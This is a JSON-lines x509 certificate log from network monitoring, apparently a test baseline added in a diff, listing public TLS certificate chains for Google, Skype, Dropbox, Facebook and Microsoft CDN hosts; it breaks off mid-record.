+{"ts":"2018-08-03T23:39:00.952537Z","id":"FKHdmftHrXMTOJnLb","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.952537Z","id":"FLt6n43nup01hgUJPa","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.016198Z","id":"FYXpw71hdIt6aLGodl","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.016198Z","id":"FMTabC20eLafQNmrw4","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.016198Z","id":"FkweQG2tyhRn06nZu3","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.056647Z","id":"FAWYkhSTlDrW4zmG8","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.056647Z","id":"FkCIyh1vPYpMNlGadg","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.056647Z","id":"FDyssf1zAugB0EeYw1","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.044049Z","id":"FF3hLD13OZyCMS2fhb","certificate.version":3,"certificate.serial":"6EFF8CDCF8934A7D","certificate.subject":"CN=*.mail.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:11:20.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.mail.google.com","*.client-channel.google.com","*.docs.google.com","*.drive.google.com","*.plus.google.com","*.sites.google.com","*.talkgadget.google.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.044049Z","id":"FlIZHQ3CcHO5gdWOrl","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.044049Z","id":"F1A7rz4wRMJBRVJwZg","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.115711Z","id":"FYKeRP3dX0v9FwyE8i","certificate.version":3,"certificate.serial":"39E210ADAD78166C400963DEF20B9EDFCF7D4C78","certificate.subject":"CN=*.skype.com,OU=Site Operations,O=Skype,L=Dublin,ST=Leinster,C=IE","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA2,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2015-03-12T01:40:21.000000Z","certificate.not_valid_after":"2016-03-12T02:40:18.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.skype.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.115711Z","id":"FoI0ShA4VLujlOh2g","certificate.version":3,"certificate.serial":"0727A46B","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA2,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:36:10.000000Z","certificate.not_valid_after":"2021-04-02T21:35:52.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.115711Z","id":"FujVRs3os4DAVfmskb","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.125873Z","id":"F8Gvwo1p7yI8U1kDP5","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.125873Z","id":"FaIOcL3HdZdxJSJ7h2","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.134053Z","id":"FVqtjKGbQCHyO9pTi","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.134053Z","id":"FaLJdx160Ul1lXcFzg","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.134053Z","id":"FVUnE731hICXI8mnbb","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.149170Z","id":"FTw9cr3aXckwFRvEY3","certificate.version":3,"certificate.serial":"0587","certificate.subject":"CN=www.skypeassets.com,O=Skype\u005c, Inc.,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=GeoTrust SSL CA - G4,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2015-03-09T17:32:22.000000Z","certificate.not_valid_after":"2016-05-10T06:51:40.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["apps.skypeassets.com","beta.skypeassets.com","secure.skypeassets.com","static.skypeassets.com","www.skypeassets.com","skypeassets.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.117640Z","id":"Fvmqpi1D80JvXKZs8","certificate.version":3,"certificate.serial":"7DE0AE03FCE644649F25B2DC7BC1060C2CB0F522","certificate.subject":"CN=connect.facebook.net,OU=connect.facebook.net,O=Facebook,L=Palo Alto,ST=CA,C=US","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2014-09-05T22:34:51.000000Z","certificate.not_valid_after":"2015-09-05T22:34:48.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["connect.facebook.net"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.117640Z","id":"Fi2BIa9reEtU5kUAe","certificate.version":3,"certificate.serial":"0727A46A","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:32:45.000000Z","certificate.not_valid_after":"2021-04-02T21:31:39.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.117640Z","id":"F8kASo4eQpTHsg7U9f","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.142923Z","id":"FcwXBY2wZkFehpjtui","certificate.version":3,"certificate.serial":"2E4AE653B45327FE","certificate.subject":"CN=*.google-analytics.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T21:57:33.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.google-analytics.com","google-analytics.com","googletagmanager.com","service.urchin.com","ssl.google-analytics.com","urchin.com","www.google-analytics.com","www.googletagmanager.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.142923Z","id":"FjeUa11Q81gDWHqah2","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.142923Z","id":"FDWGMk27ZHiTjqWdFc","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.153007Z","id":"FlEI3m4ssycmfkeXN9","certificate.version":3,"certificate.serial":"5A0000BEC4AE36CB2E0B7F4B4300010000BEC4","certificate.subject":"CN=*.vo.msecnd.net","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-07T08:17:34.000000Z","certificate.not_valid_after":"2017-03-06T08:17:34.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.vo.msecnd.net","*.adn.azureedge.net","*.ads2.msads.net","*.aspnetcdn.com","*.azurecomcdn.net","*.azureedge.net","*.azureedge-test.net","*.cdn.skype.com","*.cdn.skype.net","*.cmsresources.windowsphone.com","*.cmsresources.windowsphone-int.com","*.dev.skype.com","*.fms.azureedge.net","*.microsoft-sbs-domains.com","*.secure.skypeassets.com","*.secure.skypeassets.net","*.wac.azureedge.net","*.wpc.azureedge.net","ajax.microsoft.com","cdnads.msads.net","cdn-resources.windowsphone.com","cdn-resources-beta.windowsphone.com","ecnads1.msn.com","iecvlist.microsoft.com","images-cms-pn.windowsphone-int.com","images-cms-tst.windowsphone-int.com","lumiahelptipscdn.microsoft.com","lumiahelptipscdnqa.microsoft.com","lumiahelptipsmscdn.microsoft.com","lumiahelptipsmscdnqa.microsoft.com","montage.msn.com","mscrl.microsoft.com","r20swj13mr.microsoft.com","*.streaming.mediaservices.windows.net","*.origin.mediaservices.windows.net","download.sysinternals.com"]} +{"ts":"2018-08-03T23:39:01.153007Z","id":"FucrGzBbhoce9jJCf","certificate.version":3,"certificate.serial":"0727AA47","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-05-08T00:04:09.000000Z","certificate.not_valid_after":"2018-05-08T00:03:30.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.044659Z","id":"FO8b6W2yJRpm2KXng6","certificate.version":3,"certificate.serial":"6EFF8CDCF8934A7D","certificate.subject":"CN=*.mail.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:11:20.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.mail.google.com","*.client-channel.google.com","*.docs.google.com","*.drive.google.com","*.plus.google.com","*.sites.google.com","*.talkgadget.google.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.044659Z","id":"FmnhOg1Eb8Eb2PmsP7","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.044659Z","id":"FneYmJiFUIxkgqpWc","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.150772Z","id":"FFp9pN1ufOcODkHqBa","certificate.version":3,"certificate.serial":"39E210ADAD78166C400963DEF20B9EDFCF7D4C78","certificate.subject":"CN=*.skype.com,OU=Site Operations,O=Skype,L=Dublin,ST=Leinster,C=IE","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA2,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2015-03-12T01:40:21.000000Z","certificate.not_valid_after":"2016-03-12T02:40:18.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.skype.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.150772Z","id":"Ffd5i632dB2HrKE1C8","certificate.version":3,"certificate.serial":"0727A46B","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA2,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:36:10.000000Z","certificate.not_valid_after":"2021-04-02T21:35:52.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.150772Z","id":"Fgs14E4pIlHA1JeU35","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.150772Z","id":"FJgMSk4SQwpBoX0uEh","certificate.version":3,"certificate.serial":"5459A3657F1C39925E6529611FEDAECC","certificate.subject":"CN=*.adnxs.com,O=AppNexus\u005c, Inc.,L=New York,ST=New York,C=US","certificate.issuer":"CN=GeoTrust SSL CA - G2,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2014-04-11T07:00:00.000000Z","certificate.not_valid_after":"2016-04-11T06:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.adnxs.com","adnxs.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.150772Z","id":"F8mgle2fYLztHWwkB8","certificate.version":3,"certificate.serial":"023A63","certificate.subject":"CN=GeoTrust SSL CA - G2,O=GeoTrust Inc.,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2012-08-28T03:40:40.000000Z","certificate.not_valid_after":"2022-05-21T03:40:40.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.150772Z","id":"Fz3C9o4cE1e0kyw98c","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.050208Z","id":"FtJro14P10RGS3hX3h","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.050208Z","id":"F9Wn794jMiGxbZwF45","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.050208Z","id":"FfEz9C1Syna3VQIAY1","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, 